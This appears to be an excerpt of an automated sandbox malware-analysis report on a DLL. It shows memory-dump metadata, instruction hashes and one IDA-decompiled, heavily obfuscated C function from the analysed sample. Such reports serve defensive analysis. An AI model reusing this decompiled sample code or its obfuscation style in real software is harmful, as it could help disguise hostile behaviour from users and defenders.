                          0x27ed371a9e2
                          0x27ed371a9ea
                          0x27ed371a9ee
                          0x27ed371aa04
                          0x27ed371aa0c
                          0x27ed371aa10
                          0x27ed371aa27
                          0x27ed371aa2f
                          0x27ed371aa33
                          0x27ed371aa4e
                          0x27ed371aa68
                          0x27ed371aa70
                          0x27ed371aa74
                          0x27ed371aa87
                          0x27ed371aa8f
                          0x27ed371aa93
                          0x27ed371aa9c
                          0x27ed371aaa5
                          0x27ed371aabe
                          0x27ed371aac6
                          0x27ed371aaca
                          0x27ed371aae5
                          0x27ed371ab06
                          0x27ed371ab1c
                          0x27ed371ab24
                          0x27ed371ab28
                          0x27ed371ab3c
                          0x27ed371ab44
                          0x27ed371ab48
                          0x27ed371ab61
                          0x27ed371ab64
                          0x27ed371ab67
                          0x27ed371ab6f
                          0x27ed371ab7e
                          0x27ed371ab86
                          0x27ed371ab8a
                          0x27ed371ab9e
                          0x27ed371aba7
                          0x27ed371abaf
                          0x27ed371abb3
                          0x27ed371abbf
                          0x27ed371abc7
                          0x27ed371abcc
                          0x27ed371abd4
                          0x27ed371abd8
                          0x27ed371abe7
                          0x27ed371abef
                          0x27ed371abf3
                          0x27ed371ac0f
                          0x27ed371ac25
                          0x27ed371ac32
                          0x27ed371ac38
                          0x27ed371ac45
                          0x27ed371ac51
                          0x27ed371ac58
                          0x27ed371ac63
                          0x27ed371ac70
                          0x27ed371ac77
                          0x27ed371ac84
                          0x27ed371ac91
                          0x27ed371ac95
                          0x27ed371acaf
                          0x27ed371accb
                          0x27ed371acd8
                          0x27ed371acde
                          0x27ed371ace8
                          0x27ed371acf4
                          0x27ed371acfb
                          0x27ed371ad09
                          0x27ed371ad16
                          0x27ed371ad1d
                          0x27ed371ad3b
                          0x27ed371ad5b
                          0x27ed371ad6a
                          0x27ed371ad76
                          0x27ed371ad7c
                          0x27ed371ad89
                          0x27ed371ad95
                          0x27ed371ad9c
                          0x27ed371ada8
                          0x27ed371adb0
                          0x27ed371adb4
                          0x27ed371add0
                          0x27ed371addc
                          0x27ed371ade4
                          0x27ed371ade8
                          0x27ed371adfa
                          0x27ed371ae02
                          0x27ed371ae06
                          0x27ed371ae12
                          0x27ed371ae1d
                          0x27ed371ae21
                          0x27ed371ae2e
                          0x27ed371ae36
                          0x27ed371ae3a
                          0x27ed371ae4c
                          0x27ed371ae5f
                          0x27ed371ae67
                          0x27ed371ae6b
                          0x27ed371ae79
                          0x27ed371ae84
                          0x27ed371ae88
                          0x27ed371ae94
                          0x27ed371ae9c
                          0x27ed371aea0
                          0x27ed371aea9
                          0x27ed371aeb1
                          0x27ed371aeb5
                          0x27ed371aec8
                          0x27ed371aed0
                          0x27ed371aed4
                          0x27ed371aeee
                          0x27ed371aefc
                          0x27ed371af04
                          0x27ed371af08
                          0x27ed371af18
                          0x27ed371af27
                          0x27ed371af31
                          0x27ed371af35
                          0x27ed371af42
                          0x27ed371af4e
                          0x27ed371af52
                          0x27ed371af6b
                          0x27ed371af79
                          0x27ed371af86
                          0x27ed371af8a
                          0x27ed371afa0
                          0x27ed371afae
                          0x27ed371afbb
                          0x27ed371afbf
                          0x27ed371afc9
                          0x27ed371afd5
                          0x27ed371afd9
                          0x27ed371aff1
                          0x27ed371b001
                          0x27ed371b00e
                          0x27ed371b012
                          0x27ed371b02a
                          0x27ed371b039
                          0x27ed371b046
                          0x27ed371b04a
                          0x27ed371b054
                          0x27ed371b060
                          0x27ed371b064
                          0x27ed371b071
                          0x27ed371b07e
                          0x27ed371b082
                          0x27ed371b09a
                          0x27ed371b0a9
                          0x27ed371b0b6
                          0x27ed371b0ba
                          0x27ed371b0d2
                          0x27ed371b0d5
                          0x27ed371b0e9
                          0x27ed371b0fb
                          0x27ed371b0fe
                          0x27ed371b101
                          0x27ed371b104
                          0x27ed371b106
                          0x27ed371b109
                          0x27ed371b10c
                          0x27ed371b119
                          0x27ed371b122
                          0x27ed371b134
                          0x27ed371b13c
                          0x27ed371b13e
                          0x27ed371b151

                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                          • Instruction ID: c1b32bc6313010539e35687aa0aca71b8be4907dee142326e79f74dd90886a24
                          • Opcode Fuzzy Hash: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                          • Instruction Fuzzy Hash: 6C12B4B7B784514BD71CCB19E892FA97792F394308B49912CEA17D3F44DA3DEA06CA40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E00007FF87FF88C075CC0(signed int __edx, short __edi, signed int __rax, long long __rcx, signed int __r8, signed int __r9, long long _a8, signed int _a16, signed int _a24, signed int _a32, intOrPtr _a40, intOrPtr _a48, signed long long _a56, signed int _a64, intOrPtr _a80, signed int _a88, signed short _a96) {
                          				long long _v80;
                          				long long _v88;
                          				signed int _v96;
                          				signed int _v104;
                          				signed int _v112;
                          				signed long long _v120;
                          				void* _v128;
                          				long long _v136;
                          				signed int _v144;
                          				signed long long _v152;
                          				signed long long _v168;
                          				signed int _v176;
                          				signed long long _v184;
                          				signed int _v192;
                          				signed int _v200;
                          				void* __rbx;
                          				void* __rdi;
                          				void* __r15;
                          				signed int _t406;
                          				short _t415;
                          				signed long long _t422;
                          				signed short _t440;
                          				long long _t446;
                          				signed int _t452;
                          				signed int _t453;
                          				short _t459;
                          				void* _t489;
                          				signed char _t514;
                          				signed short _t521;
                          				signed int _t522;
                          				signed short _t533;
                          				signed int _t543;
                          				signed int _t642;
                          				signed short _t646;
                          				signed int _t647;
                          				void* _t662;
                          				signed short _t670;
                          				long long _t671;
                          				signed long long _t673;
                          				signed long long _t675;
                          				signed long long _t680;
                          				signed long long _t682;
                          				signed long long _t683;
                          				intOrPtr _t689;
                          				long long _t691;
                          				signed long long _t696;
                          				intOrPtr _t697;
                          				intOrPtr _t698;
                          				signed int _t699;
                          				signed long long _t700;
                          				signed long long _t702;
                          				signed long long _t708;
                          				signed long long _t709;
                          				signed long long _t710;
                          				intOrPtr _t712;
                          				intOrPtr _t713;
                          				signed long long _t714;
                          				signed long long _t721;
                          				intOrPtr _t722;
                          				signed long long _t723;
                          				signed long long _t727;
                          				signed long long _t728;
                          				long long _t729;
                          				signed long long _t730;
                          				signed int* _t735;
                          				signed long long _t745;
                          				intOrPtr _t751;
                          				signed long long _t753;
                          				signed long long _t755;
                          				signed long long _t757;
                          				intOrPtr _t764;
                          				signed long long _t766;
                          				signed long long _t770;
                          				signed long long _t774;
                          				signed long long _t778;
                          				signed long long _t780;
                          				intOrPtr _t787;
                          				intOrPtr _t788;
                          				signed int _t790;
                          				signed long long _t791;
                          				signed long long _t797;
                          				signed long long _t799;
                          				signed int _t803;
                          				signed long long _t804;
                          				signed long long _t805;
                          				signed long long _t807;
                          				signed char* _t809;
                          				long long _t815;
                          				intOrPtr _t818;
                          				signed long long _t834;
                          				signed long long _t836;
                          				signed long long _t843;
                          				signed int* _t846;
                          				signed long long _t849;
                          				signed int _t851;
                          				signed long long _t853;
                          				signed long long _t854;
                          				signed long long _t858;
                          				intOrPtr _t864;
                          				signed int _t865;
                          				short* _t866;
                          				signed int _t867;
                          
                          				_a32 = __r9;
                          				_a24 = __r8;
                          				_a16 = __edx;
                          				_a8 = __rcx;
                          				r9d = _a96 & 0x000000ff;
                          				_t521 =  *0x8c0b414c; // 0x0
                          				r14d = r9d;
                          				_t867 =  *0x8c0b4124;
                          				_t522 = _t521 + 1;
                          				_t853 =  *(_a88 +  *0x8c0b4148 * 4) | __rax;
                          				_t865 = _t867;
                          				_t864 =  *0x8c0b4150; // 0x0
                          				_t514 = __edx & 0x000000ff;
                          				_v120 = _t853;
                          				_t670 =  *0x8c0b4158; // 0x0
                          				r8d =  *0x8c0b4130 & 0x0000ffff;
                          				_v112 = _t670;
                          				_t671 =  *0x8c0b41a0; // 0x0
                          				_v128 = _t671;
                          				_t803 = r8d - r9d;
                          				r8w = r8w + 0xffff;
                          				 *0x8c0b414c = _t522;
                          				_v88 = _t671;
                          				 *0x8c0b4130 = r8w;
                          				r8d =  *0x8c0b4133 & 0x000000ff;
                          				r8b = r8b + 0xff;
                          				_v136 = _t522;
                          				_t673 =  *0x8c0b41a8; // 0x0
                          				 *0x8c0b4133 = r8b;
                          				r9d = r8b & 0xffffffff;
                          				r8b = r8b + 0xff;
                          				_a96 = r9d;
                          				r9d = _t514;
                          				 *0x8c0b4133 = r8b;
                          				_v144 = _t673;
                          				_t815 = _t673 * 4;
                          				_t778 = r9d % ( *(_t673 + 0x97e) & 0x000000ff);
                          				_v152 = _t778;
                          				_v96 = _t803;
                          				_v104 = _t728;
                          				_v80 = _t815;
                          				if ( *((intOrPtr*)(_t815 + _v128)) - ( *0x8c0b4122 & 0x000000ff) < 0) goto 0x8c075ea4;
                          				_t735 = _a40 + _t728 * 4;
                          				_t37 = _t867 + 0x461; // 0x533
                          				asm("cdq");
                          				_t406 = _t37 /  *_t735;
                          				 *_t735 = _t406;
                          				_t836 =  *0x8c0b4180; // 0x0
                          				_t675 =  *0x8c0b41a0; // 0x0
                          				_t846 = _a8 + _t675 * 4;
                          				 *_t846 = _t406 * _t836 /  *(_t853 +  *0x8c0b4168 * 4) %  *_t846;
                          				goto 0x8c0767fd;
                          				 *0x8c0b414c = _t846[0x4cd] * (_t514 & 0x000000ff);
                          				_t745 = _a56;
                          				 *((short*)(_t803 + 2 + (_t836 - ((_t836 - _t778 >> 1) + _t778 >> 8) * 0x1ff) * 2)) = __edi;
                          				r8d =  *0x8c0b4148; // 0x0
                          				_t642 = r8d;
                          				r8d = r8d + 1;
                          				 *0x8c0b4148 = r8d;
                          				if (_t642 == ( *(_t745 + r8d * 2) & 0x0000ffff)) goto 0x8c07610d;
                          				_t854 =  *0x8c0b41a0; // 0x0
                          				r8d =  *0x8c0b4194; // 0x0
                          				r8d = r8d + _t642;
                          				r8d = 0xa65;
                          				_t799 = _t642;
                          				r8d = r8d - ( *0x8c0b4130 & 0x0000ffff);
                          				_v192 = r11d;
                          				 *0x8c0b41a0 = _t854 - 1;
                          				_v200 = r8d;
                          				_t415 = E00007FF87FF88C08B370(_t854, _t745, _t778, _t799, r8d, _t867);
                          				_t729 = _v136;
                          				_v192 = _t642;
                          				_v200 = 0;
                          				 *((short*)(_t729 + _t745 * 8)) = _t415;
                          				 *((intOrPtr*)(_v80 +  *0x8c0b4140)) = _t642 -  *((intOrPtr*)(_v80 +  *0x8c0b4140));
                          				_t680 =  *0x8c0b4158; // 0x0
                          				 *((intOrPtr*)(_a40 + _t680 * 4)) = _t642 -  *((intOrPtr*)(_a40 + _t680 * 4));
                          				_t818 =  *0x8c0b4138; // 0x0
                          				asm("cdq");
                          				_t751 =  *0x8c0b4160; // 0x0
                          				r9d =  *(_t799 + _t751) & 0x000000ff;
                          				_t422 = E00007FF87FF88C08B370(_t680, _a32, _t778 +  *((intOrPtr*)(_t818 + _t799 * 8)),  *((intOrPtr*)(_t818 + _v96 * 8)) - _v152, r8d & _a32, _t867);
                          				_t533 =  *(_t799 * 8);
                          				_t780 = _t422;
                          				_v152 = _t780;
                          				if (_t533 == _t642) goto 0x8c0760d3;
                          				asm("o16 nop [eax+eax]");
                          				_t682 =  *0x8c0b4124;
                          				_t646 = (_t521 & 0x0000ffff |  *0x8c0b4120) + 1;
                          				 *(_t864 + _t682 * 2) = ( *(_t864 + _t682 * 2) & 0x0000ffff) * (_t533 & 0x0000ffff);
                          				r8d =  *(_t865 + _t682 * 8) & 0x0000ffff;
                          				r8d = r8d * (_t533 & 0x0000ffff);
                          				 *(_t729 + (_t780 + _t780 * 2) * 2) =  *(_t729 + (_t780 + _t780 * 2) * 2) | r8w;
                          				_t683 =  *0x8c0b4170; // 0x0
                          				 *(_t866 + _t683 * 2) = _t642;
                          				 *(_a88 + _a64 * 4) = ( *_a64 & 0x000000ff) %  *(_a88 + _a64 * 4);
                          				_t689 =  *0x8c0b4178; // 0x0
                          				asm("cdq");
                          				r15d = (( *(_t689 +  *0x8c0b4168 * 2) & 0x0000ffff) + ( *(_a48 + 0x1e16) & 0x000000ff)) % r15d;
                          				if (_t533 + 1 != _t642) goto 0x8c076020;
                          				r8d =  *0x8c0b4148; // 0x0
                          				_t753 = _a56;
                          				r8d = r8d + 1;
                          				 *0x8c0b4148 = r8d;
                          				if (_t642 + 1 != ( *(_t753 + r8d * 2) & 0x0000ffff)) goto 0x8c075ef0;
                          				_t849 = _a88;
                          				_t691 = r15d;
                          				_v136 = _t691;
                          				if (_t691 - _v152 <= 0) goto 0x8c076161;
                          				 *_t866 =  *_t866 + 1;
                          				_t804 =  *0x8c0b41a0; // 0x0
                          				_t805 = _t804 - 1;
                          				 *0x8c0b41a0 = _t805;
                          				if ( *((intOrPtr*)(_t849 + _t753 * 4)) -  *((intOrPtr*)(_v120 + _t805 * 4)) > 0) goto 0x8c076158;
                          				if ( *((intOrPtr*)(_t849 + _v144 * 8)) != _a96) goto 0x8c076158;
                          				r8d =  *0x8c0b4148; // 0x0
                          				goto 0x8c07617e;
                          				r8d =  *0x8c0b4148; // 0x0
                          				goto 0x8c07616d;
                          				if ( *((intOrPtr*)(_v104 + 8 + _v144 * 2)) - 0xa59 <= 0) goto 0x8c0762eb;
                          				r9d =  *0x8c0b4180 & 0x0000ffff;
                          				_t755 =  *0x8c0b4168;
                          				asm("cdq");
                          				_t696 = _v128;
                          				r10d =  *(_t696 + _t755 * 2) & 0x0000ffff;
                          				_v184 = _t849;
                          				_v192 = ( *(_t865 + _t755 * 2) & 0x0000ffff) - 0x2c0;
                          				_v200 =  *(_t849 + _t755 * 4) /  *0x8c0b4194;
                          				_t440 = E00007FF87FF88C0781C0(_t696, _t729, 0x1999 / (_t646 & 0x0000ffff), _t799 +  *0x8c0b4170, _t799 +  *0x8c0b4170, _v104);
                          				_t543 =  *0x8c0b4148; // 0x0
                          				_a96 = _t440;
                          				_t858 = _t543 + 0xffffeab4;
                          				_t757 =  *0x8c0b41a0; // 0x0
                          				r9d =  *(_t757 + _v88 + 4) & 0x000000ff;
                          				_v168 = _t696;
                          				r9d = r9d & 0x00001649;
                          				_v176 =  *0x8c0b4133 & 0x000000ff;
                          				_v184 = ( *(_t866 + 0x2a0e) & 0x0000ffff) - 0x1bcd;
                          				r8d = 0x1188;
                          				_v192 = (0x157da0e3 *  *0x8c0b4134 >> 0x20 >> 9) + (0x157da0e3 *  *0x8c0b4134 >> 0x20 >> 9 >> 0x1f);
                          				_v200 = 0x8d3;
                          				_t446 = E00007FF87FF88C079620(_t646, _t729, _t858, _t799 +  *0x8c0b4170, ( *(_t866 + 0x2a0e) & 0x0000ffff) - 0x1bcd);
                          				_t851 = _a88;
                          				_t697 =  *0x8c0b4138; // 0x0
                          				 *((long long*)(_t697 + (0x23 + _t696 * 4) * 8)) = _t446;
                          				r8d =  *0x8c0b4148; // 0x0
                          				_t807 =  *0x8c0b41a0; // 0x0
                          				goto 0x8c0762f8;
                          				_t787 =  *0x8c0b4150; // 0x0
                          				r11d = _t646 & 0x0000ffff;
                          				if (_t697 != _t787) goto 0x8c07647e;
                          				_t698 =  *0x8c0b4128; // 0x0
                          				r9d = _a16 & 0x000000ff;
                          				r9b = r9b + 1;
                          				if (( *(_v128 + _v104 * 4) & 0x0000ffff) ==  *((intOrPtr*)(_t698 +  *0x8c0b4168 * 4))) goto 0x8c07648c;
                          				_t788 =  *0x8c0b4150; // 0x0
                          				if ( *((intOrPtr*)(_a8 + _t858 * 4)) - 0x1f27 < 0) goto 0x8c07648c;
                          				if ( *0x8c0b4168 - 0x15a4 < 0) goto 0x8c07648c;
                          				r8d = r8d + 1;
                          				_t699 = r8d;
                          				 *0x8c0b4148 = r8d;
                          				r9d = 0x19ec;
                          				_t764 =  *0x8c0b41a8; // 0x0
                          				_t730 = (r9b & 0xffffffff) - ( *(_t699 + _a48) & 0x000000ff);
                          				_t452 =  *0x8c0b414c; // 0x0
                          				_t453 = _t452 - 1;
                          				 *0x8c0b414c = _t453;
                          				r9w = r9w - _t453;
                          				 *0x8c0b416c = ( *0x8c0b416c & 0x0000ffff) + 1;
                          				r10d =  *(_t699 + _t764) & 0x000000ff;
                          				_t700 = _v152;
                          				r10d = r10d & _a96;
                          				r8d =  *(_t764 + _t700 * 4) & 0x000000ff;
                          				r8d = 0x1081;
                          				 *0x8c0b41a0 = _t807 + 1;
                          				_t702 = ( *(_t865 + 0x2c + (_t700 + _t700 * 2) * 2) & 0x0000ffff) % r8d;
                          				_v184 = _t702;
                          				_v192 = 0x6c8;
                          				_v200 = r10d;
                          				_t459 = E00007FF87FF88C0781C0(_t702, _t730, _t730, _v136 + _t788, _v88, _v104);
                          				_t766 =  *0x8c0b41a0; // 0x0
                          				_t790 = _a32;
                          				 *((short*)(_t790 + 0x1c + _t766 * 2)) = _t459;
                          				 *((short*)(_t865 + _t766 * 2)) = 0x1553 -  *((intOrPtr*)(_t865 + _t766 * 2));
                          				asm("cdq");
                          				asm("cdq");
                          				 *(_t790 + _t702 * 2) = ( *0x8c0b4130 & 0x0000ffff) %  *0x8c0b4168 % ( *(_t790 + _t702 * 2) & 0x0000ffff);
                          				 *0x8c0b4124 =  *0x8c0b4124 - 1;
                          				goto 0x8c0767fd;
                          				r9d = _a16 & 0x000000ff;
                          				goto 0x8c076345;
                          				r9b = r9b + 0xff;
                          				_t809 = _a64;
                          				_a88 = _t702;
                          				_a16 = r9b;
                          				 *(_a32 + _t702 * 2) =  *(_a32 + _t702 * 2) ^ 0x0000d5ef;
                          				_t791 =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b41a0 = _t791 + 1;
                          				 *((short*)(_t864 + _t766 * 2)) = (r9b & 0xffffffff) / _t766;
                          				_t708 =  *0x8c0b4180; // 0x0
                          				 *(_t766 * 8) = _t708;
                          				_t662 =  *0x8c0b4190 - (_t809[0x1258] & 0x000000ff); // 0x0
                          				if (_t662 != 0) goto 0x8c076734;
                          				_t647 = _v112 & 0x0000ffff;
                          				_a96 = 0x4d1 - _t646;
                          				_t709 =  *0x8c0b41a0; // 0x0
                          				_t710 = _t709 + _t709;
                          				asm("cdq");
                          				 *0x8c0b4194 =  *(_t851 + _t710 * 8) / _t647;
                          				 *(_t730 << 5) = _t710 ^ _a24;
                          				_t712 =  *0x8c0b4178; // 0x0
                          				_t713 =  *0x8c0b4140; // 0x0
                          				_t714 =  *0x8c0b4160; // 0x0
                          				asm("cdq");
                          				_t843 = ( *(_t714 + 0x59b) & 0x000000ff) /  *0x8c0b4168;
                          				r10d =  *(_v96 + _t714 * 2) & 0x0000ffff;
                          				_v192 = r10d;
                          				_v200 =  *((intOrPtr*)(_t851 + 0x21d8));
                          				_t489 = E00007FF87FF88C08B370(_t714, _v96, ( *(_t712 + _t730 * 4 - 4) & 0x0000ffff) - (0x415708ef * ( *(_t712 + _t730 * 4 - 4) & 0x0000ffff) >> 0x20 >> 8) * 0x3eb,  *(_t713 +  *0x8c0b4124 * 4) * 0xfc9, _t843, _t867);
                          				asm("cdq");
                          				 *0x8c0b4168 = (_a80 - 1) %  *0x8c0b4168;
                          				_t797 =  *0x8c0b4160; // 0x0
                          				r9d =  *_t809 & 0x000000ff;
                          				if ( *((intOrPtr*)(_t797 + _t843 * 2)) - ( *(_t714 + _t797) & 0x000000ff) >= 0) goto 0x8c0766cd;
                          				if (_v112 - 0x1923 > 0) goto 0x8c0766cd;
                          				_t770 =  *0x8c0b4124;
                          				if ( *((intOrPtr*)(_v96 +  *0x8c0b4148 * 2)) != ( *(_v104 + _t770 * 2) & 0x0000ffff)) goto 0x8c0766cd;
                          				if (_t770 ==  *(_a88 * 8)) goto 0x8c0766cd;
                          				 *((char*)(_v144 + _a48)) = 0x1923 / _t770;
                          				goto 0x8c0767fd;
                          				r9d = _a16 & 0x000000ff;
                          				_t721 = _t647 - (0x39835051 * _t647 >> 0x20 >> 9) * 0x8e7 -  *0x8c0b41a0;
                          				 *0x8c0b41a0 = _t721;
                          				 *((intOrPtr*)(_t721 * 2 + _t865)) =  *((intOrPtr*)(_t721 * 2 + _t865)) + 0x1c74 - r8w;
                          				 *0x8c0b4123 = (_a96 & 0x0000ffff) / ( *0x8c0b4130 & 0x0000ffff);
                          				r9b = r9b + 0xff;
                          				r15w = r15w & 0x00000044;
                          				_t722 =  *0x8c0b4188; // 0x0
                          				_t774 = _t489 + _t489;
                          				_t723 =  *0x8c0b41a0; // 0x0
                          				 *((short*)(_a56 + _t721 * 4)) = ( *(_t866 + 0x38 + _t723 * 2) & 0x0000ffff) + ( *(_t722 + 0x38 + _t774 * 8) & 0x0000ffff) -  *((intOrPtr*)(_a56 + _t721 * 4));
                          				 *0x8c0b41a0 =  *0x8c0b41a0 + 1;
                          				r15w = r15w -  *(_t866 + _t723 * 2);
                          				 *(_t866 + _t723 * 2) = r15w;
                          				 *(_a8 + _t774 * 4) = (r9b & 0xffffffff) /  *0x8c0b4180 /  *(_a8 + _t774 * 4);
                          				_t834 =  *0x8c0b4170; // 0x0
                          				_t727 =  *0x8c0b4134;
                          				 *(_t834 * 8) =  *(_t834 * 8) | 0x0000127b % ( *(_t866 + _t797 * 2) & 0x0000ffff) ^ _t727;
                          				 *((short*)(_a32 + _t727 * 4)) = 0x1189 -  *((intOrPtr*)(_a32 + _t727 * 4));
                          				return 0x1d67;
                          			}









































































































                          0x7ff88c075cc0
                          0x7ff88c075cc5
                          0x7ff88c075cca
                          0x7ff88c075cce
                          0x7ff88c075cfc
                          0x7ff88c075d05
                          0x7ff88c075d0b
                          0x7ff88c075d0e
                          0x7ff88c075d1c
                          0x7ff88c075d25
                          0x7ff88c075d2f
                          0x7ff88c075d32
                          0x7ff88c075d39
                          0x7ff88c075d3e
                          0x7ff88c075d4a
                          0x7ff88c075d54
                          0x7ff88c075d5c
                          0x7ff88c075d64
                          0x7ff88c075d6e
                          0x7ff88c075d73
                          0x7ff88c075d7b
                          0x7ff88c075d7f
                          0x7ff88c075d8b
                          0x7ff88c075d93
                          0x7ff88c075d9b
                          0x7ff88c075da3
                          0x7ff88c075daa
                          0x7ff88c075daf
                          0x7ff88c075db6
                          0x7ff88c075dbd
                          0x7ff88c075dc1
                          0x7ff88c075dc5
                          0x7ff88c075dde
                          0x7ff88c075de6
                          0x7ff88c075ded
                          0x7ff88c075df2
                          0x7ff88c075dfa
                          0x7ff88c075e04
                          0x7ff88c075e09
                          0x7ff88c075e11
                          0x7ff88c075e19
                          0x7ff88c075e26
                          0x7ff88c075e30
                          0x7ff88c075e34
                          0x7ff88c075e3b
                          0x7ff88c075e3c
                          0x7ff88c075e3e
                          0x7ff88c075e40
                          0x7ff88c075e47
                          0x7ff88c075e56
                          0x7ff88c075e9c
                          0x7ff88c075e9f
                          0x7ff88c075eb1
                          0x7ff88c075ebb
                          0x7ff88c075ec3
                          0x7ff88c075ec8
                          0x7ff88c075ecf
                          0x7ff88c075ed2
                          0x7ff88c075ed8
                          0x7ff88c075ee5
                          0x7ff88c075ef0
                          0x7ff88c075f03
                          0x7ff88c075f11
                          0x7ff88c075f25
                          0x7ff88c075f2b
                          0x7ff88c075f2e
                          0x7ff88c075f3a
                          0x7ff88c075f41
                          0x7ff88c075f48
                          0x7ff88c075f4d
                          0x7ff88c075f57
                          0x7ff88c075f5c
                          0x7ff88c075f60
                          0x7ff88c075f69
                          0x7ff88c075f80
                          0x7ff88c075f82
                          0x7ff88c075f99
                          0x7ff88c075fa1
                          0x7ff88c075fa8
                          0x7ff88c075fc7
                          0x7ff88c075fd3
                          0x7ff88c075fec
                          0x7ff88c075ff1
                          0x7ff88c075ffd
                          0x7ff88c076000
                          0x7ff88c076007
                          0x7ff88c076015
                          0x7ff88c076020
                          0x7ff88c076027
                          0x7ff88c076039
                          0x7ff88c076046
                          0x7ff88c07604c
                          0x7ff88c076058
                          0x7ff88c07605c
                          0x7ff88c076063
                          0x7ff88c076099
                          0x7ff88c0760a3
                          0x7ff88c0760bf
                          0x7ff88c0760c3
                          0x7ff88c0760c8
                          0x7ff88c0760d3
                          0x7ff88c0760dc
                          0x7ff88c0760e4
                          0x7ff88c0760ea
                          0x7ff88c0760f7
                          0x7ff88c0760fd
                          0x7ff88c07610d
                          0x7ff88c076110
                          0x7ff88c076118
                          0x7ff88c07611a
                          0x7ff88c07611e
                          0x7ff88c076125
                          0x7ff88c076128
                          0x7ff88c076140
                          0x7ff88c07614d
                          0x7ff88c07614f
                          0x7ff88c076156
                          0x7ff88c076158
                          0x7ff88c07615f
                          0x7ff88c076178
                          0x7ff88c076186
                          0x7ff88c0761b2
                          0x7ff88c0761d8
                          0x7ff88c0761ea
                          0x7ff88c0761ef
                          0x7ff88c0761fe
                          0x7ff88c076206
                          0x7ff88c07620e
                          0x7ff88c076212
                          0x7ff88c076217
                          0x7ff88c076230
                          0x7ff88c07624a
                          0x7ff88c076252
                          0x7ff88c076266
                          0x7ff88c07626e
                          0x7ff88c076273
                          0x7ff88c07628c
                          0x7ff88c076295
                          0x7ff88c07629a
                          0x7ff88c07629d
                          0x7ff88c0762a2
                          0x7ff88c0762ab
                          0x7ff88c0762b0
                          0x7ff88c0762d0
                          0x7ff88c0762d7
                          0x7ff88c0762db
                          0x7ff88c0762e2
                          0x7ff88c0762e9
                          0x7ff88c0762fd
                          0x7ff88c076304
                          0x7ff88c076310
                          0x7ff88c076322
                          0x7ff88c076329
                          0x7ff88c076332
                          0x7ff88c076338
                          0x7ff88c07633e
                          0x7ff88c076355
                          0x7ff88c076365
                          0x7ff88c076373
                          0x7ff88c07637e
                          0x7ff88c076384
                          0x7ff88c076391
                          0x7ff88c07639f
                          0x7ff88c0763a6
                          0x7ff88c0763a9
                          0x7ff88c0763af
                          0x7ff88c0763b1
                          0x7ff88c0763b7
                          0x7ff88c0763c5
                          0x7ff88c0763cf
                          0x7ff88c0763d4
                          0x7ff88c0763d9
                          0x7ff88c0763e1
                          0x7ff88c0763f6
                          0x7ff88c0763fc
                          0x7ff88c076403
                          0x7ff88c076409
                          0x7ff88c07640e
                          0x7ff88c076417
                          0x7ff88c07641c
                          0x7ff88c076421
                          0x7ff88c076428
                          0x7ff88c076430
                          0x7ff88c076443
                          0x7ff88c076463
                          0x7ff88c07646c
                          0x7ff88c07646f
                          0x7ff88c076473
                          0x7ff88c076479
                          0x7ff88c07647e
                          0x7ff88c076487
                          0x7ff88c076494
                          0x7ff88c076498
                          0x7ff88c0764a9
                          0x7ff88c0764b1
                          0x7ff88c0764b9
                          0x7ff88c0764be
                          0x7ff88c0764cf
                          0x7ff88c076505
                          0x7ff88c076510
                          0x7ff88c07651f
                          0x7ff88c07652e
                          0x7ff88c076535
                          0x7ff88c07654a
                          0x7ff88c07654f
                          0x7ff88c076556
                          0x7ff88c07655d
                          0x7ff88c076564
                          0x7ff88c07656c
                          0x7ff88c076594
                          0x7ff88c076597
                          0x7ff88c0765c6
                          0x7ff88c0765de
                          0x7ff88c0765ec
                          0x7ff88c076601
                          0x7ff88c07660b
                          0x7ff88c076612
                          0x7ff88c076617
                          0x7ff88c07661c
                          0x7ff88c076634
                          0x7ff88c07663b
                          0x7ff88c076641
                          0x7ff88c07664c
                          0x7ff88c076658
                          0x7ff88c076664
                          0x7ff88c07666e
                          0x7ff88c076686
                          0x7ff88c07669e
                          0x7ff88c0766c4
                          0x7ff88c0766c8
                          0x7ff88c0766cd
                          0x7ff88c0766f5
                          0x7ff88c0766fc
                          0x7ff88c076718
                          0x7ff88c07672e
                          0x7ff88c076739
                          0x7ff88c076745
                          0x7ff88c07674e
                          0x7ff88c076758
                          0x7ff88c076760
                          0x7ff88c076778
                          0x7ff88c07677c
                          0x7ff88c076786
                          0x7ff88c07678e
                          0x7ff88c0767bf
                          0x7ff88c0767c7
                          0x7ff88c0767da
                          0x7ff88c0767e7
                          0x7ff88c0767f8
                          0x7ff88c076815

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db6ca8fb41c8cf6cd69c8ef76619ea67670e755baa92d9266841555edbf901a7
                          • Instruction ID: 5c010bf3a6e24c23ca02783efeea4e46f9cc447aa0262da1e2fb41fdae510364
                          • Opcode Fuzzy Hash: db6ca8fb41c8cf6cd69c8ef76619ea67670e755baa92d9266841555edbf901a7
                          • Instruction Fuzzy Hash: 6562C472E08A9185DF64CF59E8802797BA5FBAABC1F014536EA8D87768DF3CD150DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
